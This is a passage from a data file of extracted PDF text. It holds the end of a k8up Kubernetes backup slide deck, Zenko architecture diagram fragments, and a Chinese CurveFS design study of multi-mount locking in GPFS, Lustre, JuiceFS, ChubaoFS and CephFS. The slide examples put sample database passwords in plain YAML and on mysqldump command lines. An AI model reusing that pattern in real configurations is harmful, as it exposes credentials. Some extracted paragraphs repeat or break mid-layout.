AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx \n \n$ restic snapshots \nrepository dec6d66c opened successfully, password is correct \nID Date Host Tags Directory \n---------------------------------------------------------------------- \n5ed64a2d 2018-06-08 09:18:34 macbook-vshn.local /data \n---------------------------------------------------------------------- \n1 snapshots \n \n$ restic restore 5ed64a2d --target /restore\n16VSHN – The DevOps Company  Pre-Backup Pods\napiVersion: k8up.io/v1 \nkind: PreBackupPod \nmetadata: \n name: mysqldump \nspec: \n backupCommand: sh -c 'mysqldump -u$USER -p$PW -h $DB_HOST --all-databases' \n pod: \n spec: \n containers: \n - env: \n - name: USER \n value: dumper \n - name: PW \n value: topsecret \n - name: DB_HOST \n value: mariadb.example.com \n image: mariadb \n command: \n - 'sleep' \n - 'infinity' \n imagePullPolicy: Always \n name: mysqldump\n17VSHN – The DevOps Company  Demo!\n18VSHN – The DevOps Company  Backup of all PVCs in the same namespace as the Schedule object\n\"Application-Aware\" backups\nBackup of data piped through stdin\nRegularly checks for data sanity using restic check\nArchive feature on a dedicated location (for example AWS Glacier)\nDefault backup mechanism on APPUiO CloudOther Features\n19VSHN – The DevOps Company  20VSHN – The DevOps Company  Annotation-Aware Backups\n--- \n# … \ntemplate: \n metadata: \n labels: \n app: mariadb \n annotations: \n appuio.ch/backupcommand: mysqldump -uroot -psecure --all-databases \n# … \n---\n21VSHN – The DevOps Company  Backup of RWO storage\nAlready in 2.6.0-rc2, released today!\nk8up CLI\nBetter visibility of backups\nList available snapshots directly in Kubernetes\nUsability improvements\nSpecify in which container to run backup commandsRoadmap\n22VSHN – The DevOps Company  Your favorite IDE (with a Go plugin)\nDocker\nmake\nKindHow to Contribute?\ngithub.com/vshn/k8up\nGo\n23VSHN – The DevOps Company  Adrian Kosmaczewski, Developer Relations – \nVSHN AG – Neugasse 10 – CH-8005 Zürich – +41 44 545 53 00 – – Thanks!\nadrian@vshn.ch\nvshn.chinfo@vshn.ch\n24" } ]
{ "category": "Runtime", "file_name": "Zenko_arch_NoNFS.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "GUICloudServer/\nBlobserverAWS\nGCP\nAzureS3C/RINGZenko\nClientBucket & Object \nNamespace\nMongoDBClouds( d a t a a n d\nm e t a d a t a )CLI" } ]
{ "category": "Runtime", "file_name": "CloudServer.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "S3 RoutesCloudServer\nMetadata \nBackendData Backend S3 Client S3S3C\nGCP\nAzure\nRING\nsproxydAWS S3\nmd\nmd\nOpLogleaderMongoDB" } ]
{ "category": "Runtime", "file_name": "Zenko_cluster_NoNFS.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "Server 1 (Master) Zenko \nServicesCluster\nZenko \nServicesZenko \nServices\nServer 2\nServer 3Zenko \nServices\nZenko \nServicesZenko \nServices\nZenko \nServices\nZenko \nServicesZenko \nServicesCLI\nGUIZenko \nInstance\nAzureGCPClientK8S\nK8S\nK8SRING\nAWS\n" } ]
{ "category": "Runtime", "file_name": "CurveFS支持多挂载.pdf", "project_name": "Curve", "subcategory": "Cloud Native Storage" }
[ { "data": "CurveFS 支持多挂载 \n• 背景 \n• 本地文件系统的文件并发读写 \no write和read行为 \no 内核数据结构 \no 多进程共享同一个文件 \n▪ O_APPEND \n▪ 文件锁flock/fcntl \n▪ 总结 \n• 多挂载文件系统调研 \no GPFS \n▪ 简介 \n▪ 数据和元数据资源并发保护 \n▪ 数据保护:字节区间锁 \n▪ 元数据保护:共享写锁 \n▪ Allocation Map 保护 \n▪ 其他元数据信息保护 \n▪ 总结 \no Lustre \n▪ 简介 \n▪ Lustre分布式锁管理器模型 \n▪ 基本锁模型 \n▪ 意图锁 \n▪ 范围锁 \n▪ 总结 \no JuiceFS ▪ 简介 \n▪ JuiceFS 使用DBServer 管理锁 \n▪ flock锁 \n▪ fcntl区间锁 \n▪ 总结 \no ChubaoFS \no CephFS \n▪ cephfs使用cap实现分布式锁 \n▪ caps permission \n▪ caps combination \n▪ caps管理 \n▪ 总结: \n▪ fuse write 实例 \n▪ 总结 \no NFS \n▪ 简介 \n▪ 数据和元数据缓存一致性 \n▪ 客户端缓存 \n▪ 结论 \n• 业务场景 \no AI场景 \n• CurveFS 如何支持多挂载 \n背景 \n当前有较多应用场景对于文件系统有一写多读、多写的需求,即同一个文件系统可以在多\n台机器上同时挂载并进行读写。例如: \n▪ 云原生数据库:多台计算节点共同使用一个文件系统,其中主计算节点支持读写,\n从计算节点支持读。 ▪ AI 训练:多台计算节点共享同一个文件系统,基本没有写同一个文件的场景,一\n个节点的写入数据是需要对其他节点立即可见。 \n下图描述的是 curvefs 的多挂载场景, client1 和client2分别在不同的节点上,挂载到\n相同的文件系统 fs1上。 \n \n一写多读场景: client1 写入文件 write(/mnt/mount1/test, 0, 4, \"aaaa\") ,client2\n读取文件 read(/mnt/mount1/test, 0, 4) ,期望可以读到 \"aaaa\"。对于一个文件系统,\n同一时刻只有一个节点在写入。 \n多写多读场景 1:client1 写入文件 write(/mnt/mount1/test, 0, 4, \"aaaa\") ,同时\nclient2写入文件 write(/mnt/mount1/test2, 0, 4, \"bbbb\") ,在两个节点写入完成之\n后,client2读取到read(/mnt/mount1/test, 0, 4) 为\"aaaa\", client1 读取到\nread(/mnt/mount1 /test2, 0, 4) 为\"bbbb\"。对于同一个文件系统,同一 时刻有多个节\n点写入,但写入的是不同文件。 \n多写多读场景 2:client1 写入文件 write(/mnt/mount1/test, 0, 4, \"aaaa\") ,同时\nclient2写入文件 write(/mnt/mount1/test, 4, 4, \"bbbb\") ,在两个节点写入完成之\n后,client1和client2 读取到read(/mnt/mount1/test, 0, 8) 为\"aaaabbbb\" 。对于同\n一个文件系统,同一时刻有多个节点写入同一个文件的不同位置。 \n多读多写场景 3:client1 写入文件 write(/mnt/mount1/test, 0, 4, \"aaaa\") ,同时\nclient2写入文件 write(/mnt/mount1/test, 0, 4, \"bbbb\") , 在两个节点写入完成之\n后,client1和client2 读取到read(/mnt/mount1/test, 0, 4) 要不是\"aaaa\", 要不是\n\"bbbb\"。对于同一个文件系统,同一时刻有多个节点写入同一个文件的相同位置。 \n对于以上四中场景, curvefs 在并发读写场景下需要支持何种一致性?如何支持?是本文\n需要得出的结论 。 \n本地文件系统的文件并发读写 \n在调研多挂载文件系统之前,我们梳理一下本地文件系统对于文件读写的并发操作行为。 \nwrite和read行为 \nposix接口说明: \n1. posix并没有规定并发写行为。 \nThis volume of POSIX.1 ‐2008 does not specify behavior of concurrent \nwrites to a file from multiple processes. Applications should use some \nform of concurrency control. \n2. posix规定read在write返回后可以获取新的数据。无论读写在同一个进程还是\n在不同进程,读写都要保证这样的语义。 \n3. POSIX requires that a read(2) that can be proved to occur after a \nwrite() has returned will return the new data. Note that not all \nfilesystems are POSIX conforming. \nIf a read() of file d ata can be proven (by any means) to occur after a \nwrite() of the data, it must reflect that write(), even if the calls \nare made by different processes. A similar requirement applies to \nmultiple write operations to the same file position. This is needed to \nguarantee the propagation of data from write() calls to subsequent \nread() calls. This requirement is particularly significant for networked \nfile systems, where some caching schemes violate these semantics. \n但是linux提供了一些系统调用,使得用户可以在使用这些接口实现实现期望的并发行\n为。 \n内核数据结构 \nlinux支持多进程间共享打开文件,同一时刻允许多个进程同时打开文件,每个进程之间\n的读写操作互不影响。为了实现这一个机制, linux内核使用了三种数据结构表示打开的\n文件。 \n1、每个进程的进程表中有一个记录项,包含了当前进程所有打开的文件描述符,它包含\n了一个指向文件表项的指针和文件描述符标志。 \n2、内核中,为所有打开的文件维持一张表,它包含了以下内容: \n▪ 当前文件打开状态:以何种方式打开该文件,只读、只写或者可读可写 \n▪ 当前文件的偏移量:当前文件指针所处的位置 \n▪ 指向该文件节点表的指针:节点包含当前文件的属性信息 3、每个文件的信息被封装在 v节点表项中,包含了当前文件名、所有者以及 inode等信\n息。 \n三者之间的关系为: \n 当对文件进行写操作时,在文件表项中的文件偏移量将增加写入的字节数。如果此时文件\n偏移量超过了文件长度,则更新文件长度为当前的文件偏移量 \n多进程共享同一个文件 \n因为每个文件描述符都有一个属于自己的文件表项,所以每个进程之间的文件指针偏移互\n相独立,互相读写不干扰:每 次write完成之后,文件表项的当前文件指针偏移量会立马\n加上写入的字节数。 \n那如何协调多进程之间的数据写入呢? linux 提供了以下几种方式: \n O_APPEND \n如果打开文件的时候加了 O_APPEND 参数,每次写入数据前先把偏移量设置到文件末尾 \n文件锁flock/fcntl \nflock \nflock - apply or remove an advisory lock on an open file \n▪ flock 提供的文件锁是建议性质的。即一个进程可以忽略其他进程加的锁,直接对\n目标文件进行读写操作。只有当前进程主动调用 flock去检查,文件锁才会在多进\n程同步中起到作用。 \n▪ 文件锁必须作用在一个打开的文件上。 \nLocks created by flock() are associated with an open file table entry. \nflock() creates locks on systems's \"Open file descriptions\". \"Open file \ndescriptions\" are generated by open() calls. \na filedescriptor (FD) is a reference to a \"Open file description\". F Ds \ngenerated by dup() or fork() refer to the same \"Open file description\". \nflock对已打开的文件加锁时,是加在文件表项上 。考虑这种场景:进程 1打开file1拿\n到fd0,进程2打开file1拿到fd1: \n▪ flock 提供的文件锁是建议性质的。即一个进程可以忽略其他进程加的锁,直接对\n目标文件进行读写操作。只有当前进程主动调用 flock去检查,文件锁才会在多进\n程同步中起到作用。 \n▪ 文件锁必须作用在一个打开的文件上。 \nLocks created by flock() are associated with an open file table entry. \nflock() creates locks on systems's \"Open file descriptions\". \"Open file \ndescriptions\" are generated by open() calls. \na filedescriptor (FD) is a reference to a \"Open file description\". F Ds \ngenerated by dup() or fork() refer to the same \"Open file description\". \nflock对已打开的文件加锁时,是加在文件表项上 。考虑这种场景:进程 1打开file1拿\n到fd0,进程2打开file1拿到fd1: \n如果进程 2对fd1加上了排他锁,实际就是加在了 fd1指向的文件表项上。此时,进程 1\n对fd0加锁会失败。 \n因为操作系统会检测到进程 1中fd0对应的文件表项 和 进程2中fd1对应的文件表项指\n向相同的 v节点,且进程 2中fd2对应的文件表项已经加了排它锁。 \nfcntl \nfnctl locks work as a Process < --> File relationship, ignoring filedescriptors \n \n#include <unistd.h> \n#include <fcntl.h> \n \nint fcntl(int fd, int cmd, ... /* arg */ ); \nfcntl 有多种功能,这里主要介绍文件锁相关的,当 cmd 被设置的 是与文件锁相关的宏\n时,fcntl 就是用于实现文件锁。 \ncmd关于锁的三个命令 : F_GETLK ,F_SETLK,F_SETLKW \nfcntl对已打开文件加锁时,是加在进程上,和文件描述符无关。 fcntl 可以对文件区间\n上锁。所有进程共享操作同一个文件的时候,只有一个 v节点。共享同一个文件相当于共\n享同一个链表。 \n \n• 对于一个文件的任意字节 ,最多只能存在一种类型的锁 (读锁或者写锁 ); \n• 一个给定字节可以有多个读锁 ,但是只能有一个写锁 ; \n• 当一个文件描述符不是打开来用于读时 ,如果我们对它请求一个读锁 ,会出错,同理,\n如果一个描述符不是打开用于写时 ,如果我们对它请求一个写锁 ,也会出错 ; \n• 正如前面所讲的 ,锁不能通过 fork由子进程继承 . \n总结 \n▪ linux 通过文件锁 flock 和 区间锁 fcntl,支持多进程访问时的写写互斥、读写\n互斥、读读共享; \n▪ linux 通过 open 时设置 O_APPEND 标志,以及 pread/pwrite 实现原子写,支持\n多进程追加写的原子性; \nGPFS的DLM,使用一个集中的 global lock manager 运行在集群中的某个 node,与运行\n在每个node的local lock manager 协作,global lock mana ger通过分发 lock token\n在local lock manager 之间协调锁资源, lock token 传递授予分布式锁权利,而不需要\n每次获取或释放所得时候产生一个单独的消息交换,同一个 inode重复访问相同的 disk \nobject,只需要一次消息交互,当另一个 inode需要该锁时,需要额外的消息从第一个\ninode撤回lock token ,以授予第二个 node。local token 也扮演这维护 cache一致性的\n作用。 \nGPFS使用字节区间锁 (byte-range locking) 同步file data 读写。GPFS的区间锁并没有\n简单的实现为:在读写调用期间获取一个字节范围的令牌并在读写完成之后释放,因为这\n种方式锁的开销是不可接受的。 GPFS使用更复杂的字节区间锁协议以减少常见访问模式\n下的令牌竞争。 \n区间令牌的实现如下: \n1. 第一个节点写文件时会获取整个文件范围的区间锁 [0, ∞]。在没有其他节点竞争\n的情况下,所有的读写操作都不需要再和其他节点交互。 \n2. 第二个节点写同样的文件时,发起撤销第一个节点持有的部分区间锁的请求 \n3. 第一个节点接受到请求后,检查当前文件是否还在写入。 \n1. 文件已经关闭,第一个节点会解锁所有区 间,第二个节点会获取整个文件范\n围的区间锁。 因此在没有并发写的共享场景下, GPFS中的字节区间锁就是\n整个文件锁,单个锁就足以访问整个文件 \n2. 文件还在写入,第一个节点会解锁部分字节区间锁。如果当前是顺序写,第\n一个节点从 offset1开始,第二个节点需要从 offset2开始,当 offset1< \noffset2,第一个节点会解锁 [offset2, ∞],当offset1>offset2 ,第一\n个节点会解锁 [0, offset1] 。这种方式允许两个节点写一定的范围。 \n通常多个节点顺序写入同一文件的非重叠部分时,每个节点只需要获取一次字节区\n间锁。 \n4. 发起区间锁的请求包含两个信息:一个是当前正在处理的 write请求中的参数\noffset和length,另一个是未来可能访问的范围,对于顺序写,这个范围是 [当\n前写入偏移量,∞ ]。当访问模式允许预测被访问文件在特定 node即将访问的区\n域,token协商协议能够通过分割 byte-range token 最小化冲突,不仅仅是简单\n的顺序访问模式,也包括方向顺序、向前或者向后跨越式访问等访问模式。 \n下图对比了多节点读写同一个文件和读写不同文件 的性能。在单文件测试中,文件被分为\nn个连续的区间,每个节点读或写其中一个区间。读、写性能可以线性扩展。在 GPFS中\n多节点写入单个文件的速度和每个节点写入不同文件的速度相同,这说明了区间令牌的有\n效性。 \n这种方式 适用于每个节点在文件的不同且相对较大的区域中写入。 如果每个节点写入很\n多更小的区域,令牌的状态和相应的消息流将会增长。 \n字节区间标记保证 posix语义,IO的最小区间是一个山区,字节区间令牌的粒度不能小\n于一个扇区。 GPFS也使用字节区间令牌来同步数据分配, 因此即使单个写入操作不重叠\n(\"虚假共享 \"),多个节点写入同一数据块也会导致令牌冲突。为了优化不需要 posix语义\n的应用程序的细粒度共享, GPFS允许禁用字节区间锁。 \n元数据保护:共享写锁 \n和其他文件系统一样, GPFS使用inode存储文件属性和数据块。 \n▪ inode的更新。多个节点写入同一个文件会导致并发更新文件的 inode(修改文件大\n小、时间、分配空间 )。如果inode独占写锁来同步,那会导致每次写操作都有锁\n冲突。 \nGPFS在inode上使用共享写锁 (shared write lock ),允许多个 node的并发写入,\n仅需要精确的文件大小或 mtime的操作会冲突 (如:stat系统调用 )。某个访问该文\n件的node会被指定为 metanode ,只有metanode 可以读写 inode。其他node仅更新\n本地缓存的 inode拷贝,定期或者当 shared write tok en被另一个 node上的\nstat()或read()操作撤回时,将其更新传给 metanode ,metanode 通过保留最大 size\n和最新的 mtime合并来自多个 node的inode更新。非单调更新文件大小或 mtime的\n操作,如 (trunc() 或者utimes()) 需要独占 exclusive inode lock 锁。 \n▪ 数据块的更新。使用类似方式的同步。 \nGPFS使用分布式锁保证 posix语义(例如stat()系统调用 ),inode及间接快使用集\n中方式。这允许多个 node写入同一个文件,更新 metanode 没有锁冲突,每次写操作\n不需从metanode 获取信息。指定文件的 metanode 是借助token server 动态选举\n的,当一个 node第一次访问文件,它尝试获取该文件的 metanode token ,其他node\n学习,当 metanode 不再访问该文件,并且相关修改已移出 cache,该node会放弃它\n的metanode token ,并停止相应行为,当它随后收到一个来自其他 node的metadata\n请求,它会发送一个拒绝的答复,其他 node会尝试通过获取 metanode token 接管\nmetanode角色。 \nAllocation Map 保护 \nalloction map 用来记录文件系统中 disk block 的分配状态。每一个 disk block 可以划\n分为32个subblock 存储小文件,用 32位的allocation map 标记。用于查找指定大小空\n闲disk block 或者subblock 的链表。 \n分配磁盘空间需要更新 allocation map ,这个资源也是要在个节点之间同步的。 \n将map分成若干个固定数量的可独立锁定的 region,不同的 node可以从不同的 region\n分配空间,仅一个 node负责维护所有 region的空闲空间统计信息。 \n该allocation manager node 在mount阶段读取 allocation map 初始化空闲空间统计信\n息,其他 node定期汇报分配回收情况。每当 node正在使用的 region空间耗尽时,它会\n向allocation map 请求一个 region,而不是所有的 node单独查找包含空闲空间的\nregion。 \n一个文件可能包含不同 region的空间,删除一个文件需要更新 allocation map ,其他\nnode正在使用的 region会发送到相应的 node执行,allocation manager 会定期发布哪\n些node正在使用哪些 region,促进构造发送释放请求。 \n其他元数据信息保护 除了上述资源外, GPFS还包含的全局 metadata 有:文件系统配置信息,空间分配\nquota,访问控制权限,以及扩展属性。 GPFS使用中心管理节点来协调或者收集来自不同\n节点的元数据更新。例如: quota \nmanager 向写入文件的各节点分发较大的磁盘空间,配额检查在本地完成,仅偶尔与\nquota manager 交互。 \n总结 \nGPFS 用户手册:\nhttps://www.ira.inaf.it/centrocal/tecnica/GPFS/GPFS_31_Admin_Guide.pdf \nGPFS 提供用户态文件接口: \n \nGPFS 对 posix 部分接口的支持: \nposix 是否支持 \nopen with O_APPEND 支持 \n \nflock/fcntl 支持多节点的 flock \n支持maxFcntlRangePerFile 个数的fcntl() \nLustre \n简介 \nLustre文件系统是一个具有高性能、高可扩和高可靠性的基于对象的分布式文件系统。\n它通过Lustre锁管理器 (Lustre Distributed Lock Manager ,LDLM)技术为整个系统的共\n享资源提供同步访问和一致性视图。 \nLustre提供了Posix兼容的UNIX文件系统接口。 Lustre采用了基于对象存储的技术,元\n数据和存储数据分离的存储结构,带宽和存储容量可以随存储服务器增加而动态扩展。 \nLustre 由三个部件组成: \n▪ 元数据服务器( Metadata Server, MDS )维持整个系统全局一致性命名空间,负责\n处理lookup、create、unlink、stat等与文件元数据有关的命名空间操作的交以\n及与元数据相关的锁服务。 \n▪ 对象存储服务器( Object Storage Server, OSS )负责与文件数据相关的锁服务及\n实际的文件 I/O,并将I/O数据保存到后端基于对象存储的设备中。 \n▪ 客户端( Client File System, CFS ) \nLustre文件系统中,每个节点都有 DLM模块,为并发文件访问提供了各种锁服务。基于\nDLM, Lustre 使用一种范围锁来维护细粒度的文件数据并发访问的一致性。 \n在访问文件数据前,客户端首先要从 OSS获得对文件数据访问的范围锁,获得对文件访问\n授权;结合范围锁, Lustre还实现了客户端数据的写回缓冲功能。 \n在打开文件时,客户端先和 MDS交互,同时获得文件数据对象布局属性;在进行文件读写\n时,根据已获得的数据对象布局属性,在 DLM范围锁的保护下可以直接并行地与多个 OSS\n进行并行数据 I/O交互。 \nLustre分布式锁管理器模型 \nLustre在很大程度上借鉴了传统的分布式锁管理器的设计理念,其基本模型在 Lustre文\n件系统中 被称为普通锁 (Plain Lock) 。再此基础上, Lustre对普通锁模型进行了扩张,\n引入了两种新类型锁:意图锁 (Intent Lock) 和范围锁 (Extent Lock) 。 \n基本锁模型 \nLustre DLM 模型使用锁命名空间 (Lock Namespace) 来组织和管理共享资源以及资源上的\n锁。当要获得某个资源的锁时,先要将该资源在锁命名空间中命名。任何资源都属于一个\n锁资源命名空间,而且都有一个相应的父资源。每个锁资源都有一个资源名,该资源名对\n其父节点是唯一的。所有的锁资源组成一个锁资源树型结构。当要获得某个 资源的锁时,\n系统必须首先从该资源的所有祖先获得锁。 Lustre支持六种锁模式,如下: \n模\n式 名称 访问授\n权 含义 \nEX 执行 RW 允许资源的读写访问,且其他任何进程不能获得读写权限 \nPW 保护\n写 W 允许资源的写访问,且其他任何进程不能获得写权限 \nPR 保护\n读 R 允许资源的读访问,且其他任何进程不能获得写权限但可共享\n读 \nCW 并发\n写 W 对其他进程没有限制,可以对资源并发写访问,无保护方式写 \nCR 并发\n读 R 对其他进程没有限制,可以对资源并发读访问,无保护方式读 \nNL 空 无 仅仅表示对该资源有兴趣,对资源没有访问权限 \n每种锁都有一定的兼容性,如果一个锁可以与已经被授权的锁共享访问资源,则称为锁模\n式兼容。下图是锁兼容性转换表, \"1\"表示锁模式可以并存。执行锁严格性最高,兼容性\n最差;空锁严格性最低,兼容性最好。 \n \n在Lustre锁管理器中,锁命名空间中每个资源都维持三个锁队列: \n1. 授权锁队列:该队列包含所有已被锁管理器授权的锁。但正在转换为与已授权锁模\n式不兼容的锁除外,该队列的锁的持有者可以对资源进行访问。 \n2. 转换锁队列:该队列锁已经授权,但试图转换的锁模式与当前授权队列中的锁模式\n不兼容,正在等待其他锁的释放或降低访问权限。锁管理器按照 FIFO的顺序处理\n转化队列中的锁。 \n3. 等待锁队列:该队列包含所有正在等待授权的新锁请求。该队列中锁模式与已授权\n的锁模式不兼容。锁管理器按 FIFO的顺序处理等待队列中的锁。 \n新锁请求只有在三个队列为空或者请求的锁模式与该资源所有的锁模式兼容时才会被授\n权,否则就会被加入等待锁队列中。如下图所示: \n \n对于资源 res1 \n▪ CR锁L1和CW锁L2是相互兼容的锁,都已经获得了访问授权; \n▪ 新请求PW锁L3因为与锁 L1和锁L2模式不兼容,所以被加入到等待队列中。 \n对于资源 res2 \n▪ CR锁L1、CR锁L2和CW锁L3都获得访问授权; \n▪ 假设某个时刻持有锁 L2的客户请求将锁转换为 EX模式,因与授权的 L1、L3不兼\n容,所以转换请求必须等待 L1、L3的释放才能获得锁而被加入到转换队列中。 \n意图锁 \nLustre中,意图锁主要用于文件元数据的访问,它通过执行锁的意图来减少元数据访问\n所需要的消息传递次数,从而减少每次操作的延迟。 \n当客户端向 MDS发起元数据操作请求时,在请求中指明操作意图,在交付给锁管理器处理\n之前,先由 MDS执行意图锁的意图,然后返回不同锁资源。 \n例如,在客户端请求创建一个新文件时: \n▪ 首先将该请求标志为文件创建的意图 (IT_CREATE) \n▪ 然后必须请求从 MDS获得它的父目录的锁来执行 lookup操作 \n▪ 如果锁请求被授权,那么 MDS就用请求指定的意图来修改目录,创建请求的\n文件,成功之后并不返回父目录锁,而是返回创建文件的锁给客户端 \n \n范围锁 \n范围锁用于维护细粒度的文件数据并发访问。其实现过程与 GPFS文件系统采用的范围锁\n类似。与普通锁不同的是,范围锁增加了一个表示获得授权的锁定文件范围的域。由于同\n一资源的不同锁的锁定范围之间是有关联的,所以范围锁的语义也发生了一些变化。 \nLustre结合范围锁和本地锁管理器实现了文件数据的写回缓冲策略。下图展示了使用范\n围锁的示例: \n \n1. 客户端A要对某文件的存储对象 obj的[a, b]进行读写时,先从 OST上的锁服务器\n获得的存储对象。 obj对应锁资源的范围锁 L<PW,[a,b]>,并将该锁资源的副本\n加入到本地锁管理器中 \n2. 客户端A利用本地文件系统 VFS层的缓存机制进行读写操作 \n3. 客户端A执行完操作后并不立即将锁释放给锁服务器,而是采用一种 lazy的思\n想,只有当其他的客户端 B要获得的范围锁与该锁有冲突并且锁服务器通过阻塞回\n调函数通知 A客户端时,才将脏的缓存数据批处理地刷新到 OST,并将锁 释放返还\n给锁服务器,然后再将锁资源授权给客户端 B \n总结 \nLustre 对 posix 部分接口的支持: \nposix 是否支持 \nopen with \nO_APPEND 支持。有如下问题: \n1. 每个客户端都需要对所有 OST进行EOF锁定,有很大的锁开销 \n2. 第二个客户端在第一个客户端完成之前不能获取所有锁,客户\n端只能顺序写入 \n3. 为了避免死锁,它们以已知的一致性顺序获取锁 \nflock/fcntl 支持多节点的 flock/fcntl ,使用\"-o flock\" 的方式挂载,可以获取\n全局一致性;使用 \"-o localflock\" 可以保证本地节点上的一致性。 \n关于lustre, Lustre wiki 上有几个值得参考的问题: \n1. Lustre 数据缓存和缓存一致性的方法是什么? \n为元数据 (names, readdir, lists, inode attribute) 和 文件数据提供了完整的\n缓存一致性。客户端和服务器都使用分布式锁管理服务获取锁;在释放锁之前刷新\n缓存。 \n2. Lustre 是否符合 posix? 有例外吗? \n严格来说, posix并没有说明文件系统将如何在多个 客户端上运行。 Lustre 合理\n解释了单节点 posix要求对应到集群环境中意味着什么。 \n比如:通过 Lustre分布式锁管理器强制执行读写操作的一致性;如果在多个节点\n上运行的应用程序同时读取和写入文件的同一部分,它们将看到一致的结果。有两\n个例外: \n1. atime的更新。在高性能集群文件系统中保持完全一致的 atime更新是不实\n际的。Lustre延迟更新文件的时间:需要更新 inode时搭载更新 atime; 文\n件关闭时更新 atime。客户端读取或者写入数据时,只刷新本地缓存中的时\n间更新。 \n2. flock和lockf 通过分布式锁管理器实现全局一致性。 \n3. 为什么不使用 IBM的DLM? \nLustre DLM 设计大量借鉴了 VAX Clusters DLM 。尽管我们因不使用现有包 (例如: \nIBM的DLM)而受到一些合理的批评,但迄今为止表名我们做出了正确的选择:它更\n小、更简单,并且至少对于我们的需求而言,更具可扩展性。 \nLustre DLM 大约有6000行代码,已被证明是一项可监督的维护任务,尽管其复杂\n性令人生畏。相比之下 IBM DLM 几乎是所有 Lustre总和的大小。然而,这不一定\n是对 IBM DLM 的批评。值得称赞的是, 它是一个完整的 DLM,它实现了我们在 \nLustre 中不需要的许多功能。 \nLustre的DLM并不是真正的分布式,至少在与其他此类系统相比时不是。 Lustre \nDLM 中的锁始终由管理特定 MDT或OST的服务节点管理,并且不会像其他系统允许\n的那样更改主服务器。省略这种类似的功能使我们能够快速开发和稳定文件系统所\n需的核心 DML功能,并添加扩展(扩展锁、意图锁、策略函数等)。 JuiceFS \n简介 \nJuiceFS是高性能 posix文件系统,数据本身被持久化在对象存储,元数据根据场景需求\n被持久化在 Redis、MySQL、SQLite等多种数据库引擎中。 \nJuiceFS由三部分组成: \n1. JuiceFS 客户端:协调对象存储和元数据存储引擎,以及 POSIX、Hadoop、\nKubernetes 、S3 Gateway 等文件系统接口的实现; \n2. 数据存储:存储数据本身,支持本地磁盘、对象存储; \n3. 元数据引擎:存储数据对应的元数据,支持 Redis、MySQL、SQLite 等多种引擎; JuiceFS 使用DBServer 管理锁 \nflock锁 \nflock锁提供三种类型: F_RDLCK,F_WRLCK,F_UNLCK \nDBServer 中对于每个锁的记录如下:一条记录由 inode、sid、owner、ltype组成。其中\nsid是sessionid ,全局递增, mount的时候去 DBServer 申请。 \n因此flock可以对应 fuse进程打开的 inode,可以作用到不同的节点。 JuiceFS 用flock\n来同时保护数据和元数据资源。 \nJuiceFS 使用DBServer 管理锁 \nflock锁 \nflock锁提供三种类型: F_RDLCK,F_WRLCK,F_UNLCK \nDBServer 中对于每个锁的记录如下:一条记录由 inode、sid、owner、ltype组成。其中\nsid是sessionid ,全局递增, mount的时候去 DBServer 申请。 \n因此flock可以对应 fuse进程打开的 inode,可以作用到不同的节点。 JuiceFS 用flock\n来同时保护数据和元数据资源。 \ntype flock struct { \n Inode Ino `xorm:\"notnull unique(flock)\"` \n Sid uint64 `xorm:\"notnull unique(flock)\"` \n Owner int64 `xorm:\"notnull unique(flock)\"` \n Ltype byte `xorm:\"notnull\"` \n} \n▪ 用户请求 flock锁时,客户端从 DBServer 中获取关 于该inode的所有锁请求,并\n判断请求锁是否与已有锁冲突 \n▪ 如果没有冲突,将改锁插入数据库,加锁成功;如果有冲突,并且申请锁是阻塞类\n型,则等待指定时间后重试;如果有冲突,并且申请锁是非阻塞类型,则加锁失\n败。 \nfcntl区间锁 \n区间锁用 plock表示。DBServer 中对于每个锁的记录如下:一条记录由 inode、sid、\nowner、records 组成。 \n其中records的数据结构是 plockRecord ,每个Record由ltype、pid、start、end组\n成。 \n因此plock可以记录 fuse进程打开的 inode上各区间的上锁情况。 \ntype plock struct { \n Inode Ino `xorm:\"notnull unique(plock)\"` \n Sid uint64 `xorm:\"notnull unique(plock)\"` \n Owner int64 `xorm:\"notnull unique(plock)\"` \n Records []byte `xorm:\"blob notnull\"` \n} \ntype plockRecord struct { \n ltype uint32 pid uint32 \n start uint64 \n end uint64 \n} \n1. 用户请求 plock锁的流程处理和 flock一样,但是在检测锁冲突的时候,要和所有\n客户端持有的区间锁一一比较。 \n2. 更新锁列表有所不同, flock的更新是一条记录的删除或者插入, plock的更新的\n时候需要按照一定的规则进行新增锁记录的插入。 \n \n总结 \nJuiceFS 提供「关闭再打开( close-to-open)」一致性保证,即当两个及以上客户端同\n时读写相同的文件时,客户端 A 的修改在客户端 B 不一定能立即看到。但是,一旦这个\n文件在客户端 A 写入完成并关闭,之后在任何一个客户端重新打开该文件都可以保证能\n访问到最新写入的数据,不论是否在同一个节点。 \n「关闭再打开」是 JuiceFS 提供的最低限度一致性保证,在某些情况下可能也不需要重\n新打开文件才能访问到最新写入的数据。例如多个应用程序使用同一个 JuiceFS 客户端\n访问相同的文件(文件变更立即可见),或者在不同节点上通过 tail -f 命令查看最\n新数据。 \njuicefs 对 posix 部分接口的支持: \nposix 是否支持 \nopen with O_APPEND 不支持。多节点情况下会相互 覆盖 \nflock/fcntl 支持多节点的 flock/fcntl ,允许多节点写入,保证最终一致性 \nChubaoFS \nCurveFS的元数据设计架构类似 ChubaoFS ,这里就不再说明了。 \nchubaofs 支持: \n1. 一个客户端的写不能立马被其他客户端看到, fsync才会明确去刷这个 buffer,不\n然只是定期刷;只有 buffer数据刷出去了,另外的客户端才能看到。 \nchubaofs 不支持: \n1. 多个客户端同时写同一个文件的同一个位置 \n2. 多个客户端的同一个文件 O_APPEND flag \nchubaofs 对 posix 部分接口的支持: \nposix 是否支持 \nopen with O_APPEND 不支持。多节点情况下会相互覆盖 \nflock/fcntl 不支持。 chubao使用的bazil/fuse 不支持锁的设置 \ncase opGetlk: \npanic(\"opGetlk\") \ncase opSetlk: \npanic(\"opSetlk\") \ncase opSetlkw: \npanic(\"opSetlkw\") \nCephFS \ncephfs的官方文档 提到了cepfs和posix标准在多客户端并发写入情况下的差别: \n1. CephFS 比本地 Linux 内核文件系统的 posix语义更宽松(例如,跨越对象边界的写\n入可能会不一致)。在多客户端一致性方面,它严格小于 NFS,在写入原子性方面通常小\n于 NFS。 \n换句话说,当涉及到 POSIX 时: \nHDFS < NFS < CephFS < {XFS, ext4} \n2. 如果客户端尝试编写文件失败,写入操作不一定是原子的。也就是说,客户端可能会\n在使用 8MB 缓冲的 